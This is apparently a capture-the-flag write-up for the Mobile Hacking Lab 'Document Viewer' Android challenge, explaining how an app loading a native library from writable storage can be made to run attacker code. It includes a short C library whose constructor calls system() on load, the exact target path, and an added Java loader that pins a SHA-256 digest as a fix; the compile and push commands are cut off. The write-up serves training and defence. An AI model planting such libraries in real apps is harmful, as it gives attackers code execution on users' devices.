Document Viewer
Hello everyone. In this blog post, I will try to explain my solution steps for the Document Viewer challenge from the Mobile Hacking Lab platform. I hope it will be useful for you.
Install the app and open it.
AndroidManifest.xml Examination:
The main activity is exported and contains an intent filter with the VIEW action and several schemes, like:
file - http - https
and the MIME type: application/pdf
Let's analyze the main activity code:
setLoadButtonListener(): This function sets up the button that lets users load a PDF file.
handleIntent(): Handles incoming intents, such as when a user opens a PDF file directly from another app.
renderPdf(Uri uri): This function renders the selected or received PDF file for viewing.
requestStoragePermissionAsync(Continuation<? super Boolean> continuation): Requests storage permissions.
The important function here is loadProLibrary():
Build.SUPPORTED_ABIS[0] identifies the device's architecture (e.g., ARM, x86).
(getApplicationContext().getFilesDir(), "native-libraries/" + abi) constructs the path to a folder within the app's internal storage, where native libraries are stored.
It then constructs the full path to the Pro version of the native library (libdocviewer_pro.so).
System.load(libraryFile.getAbsolutePath()) attempts to load the native library from the constructed path.
If successful, it enables "Pro" features by setting this.proFeaturesEnabled = true.

After I had decompiled the app, I couldn't find any folder containing the libraries.
The exploit here is to create a malicious library and then upload it to the path /data/data/com.mobilehackinglab.documentviewer/files/native-libraries/x86_64/. When the app tries to load this library, if we find that the rce.txt file has been created, then we have succeeded and got RCE.

    #include <stdlib.h>

    /* The constructor attribute makes this function run as soon as the library is loaded. */
    __attribute__((constructor))
    void execute_command(void) {
        system("touch /data/data/com.mobilehackinglab.documentviewer/rce.txt");
    }

Then I compiled the C code into a native library with:
Then push it to the path: and here we succeed.
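
The loader described above passes a file from app-writable storage straight to System.load, which is why a replaced libdocviewer_pro.so runs inside the app. The following is an added example, not code from the challenge app or from this write-up: a plain-Java check that loads the library only if it stays inside the expected directory and matches a SHA-256 digest pinned at build time. The class name, method names and sample data are assumptions.

```java
import java.io.File;
import java.nio.file.Files;
import java.security.MessageDigest;

// Added example (not the challenge app's code): verify a native library before loading it.
public final class VerifiedLibraryLoader {
    // True only if lib resolves inside baseDir and its SHA-256 equals the pinned digest.
    static boolean isTrusted(File baseDir, File lib, byte[] pinnedSha256) throws Exception {
        // Canonical paths resolve ".." and symlinks, so a redirected path is rejected.
        String base = baseDir.getCanonicalPath() + File.separator;
        if (!lib.isFile() || !lib.getCanonicalPath().startsWith(base)) {
            return false;
        }
        byte[] actual = sha256(Files.readAllBytes(lib.toPath()));
        return MessageDigest.isEqual(actual, pinnedSha256); // constant-time comparison
    }

    static byte[] sha256(byte[] data) throws Exception {
        return MessageDigest.getInstance("SHA-256").digest(data);
    }

    // Replacement for the unconditional System.load(...) call: returns the value
    // the app would assign to proFeaturesEnabled.
    static boolean loadIfTrusted(File filesDir, String abi, byte[] pinnedSha256) throws Exception {
        File dir = new File(filesDir, "native-libraries/" + abi);
        File lib = new File(dir, "libdocviewer_pro.so");
        if (!isTrusted(dir, lib, pinnedSha256)) {
            return false; // missing, relocated or modified: do not load
        }
        // A gap remains between hashing and loading; shipping the library inside the
        // APK and calling System.loadLibrary avoids writable storage altogether.
        System.load(lib.getAbsolutePath());
        return true;
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample data: a temp directory stands in for getFilesDir().
        File filesDir = Files.createTempDirectory("files").toFile();
        File dir = new File(filesDir, "native-libraries/x86_64");
        dir.mkdirs();
        File lib = new File(dir, "libdocviewer_pro.so");
        Files.write(lib.toPath(), "vendor build".getBytes("UTF-8"));
        byte[] pin = sha256("vendor build".getBytes("UTF-8")); // stands in for a build-time pin
        System.out.println("original file trusted: " + isTrusted(dir, lib, pin));
        Files.write(lib.toPath(), "replaced file".getBytes("UTF-8"));
        System.out.println("replaced file trusted: " + isTrusted(dir, lib, pin));
        System.out.println("library loaded: " + loadIfTrusted(filesDir, "x86_64", pin));
    }
}
```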
